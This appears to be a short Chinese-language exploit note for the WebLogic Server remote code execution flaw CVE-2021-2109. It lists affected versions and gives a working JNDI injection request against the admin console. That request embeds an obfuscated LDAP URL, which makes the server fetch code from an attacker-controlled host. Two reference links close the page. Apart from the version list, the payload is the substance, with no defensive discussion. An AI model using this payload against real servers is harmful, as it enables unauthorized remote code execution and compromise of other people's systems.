跳转至

Weblogic Server远程代码执行漏洞 (CVE-2021-2109)

受影响版本:

  • Weblogic Server 10.3.6.0.0
  • Weblogic Server 12.1.3.0.0
  • Weblogic Server 12.2.1.3.0
  • Weblogic Server 12.2.1.4.0
  • Weblogic Server 14.1.1.0.0

JNDI注入:

/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://127.0.0;1:1389/v3yovz;AdminServer%22)

ref:

https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw

https://forum.ywhack.com/thread-115007-1-1.html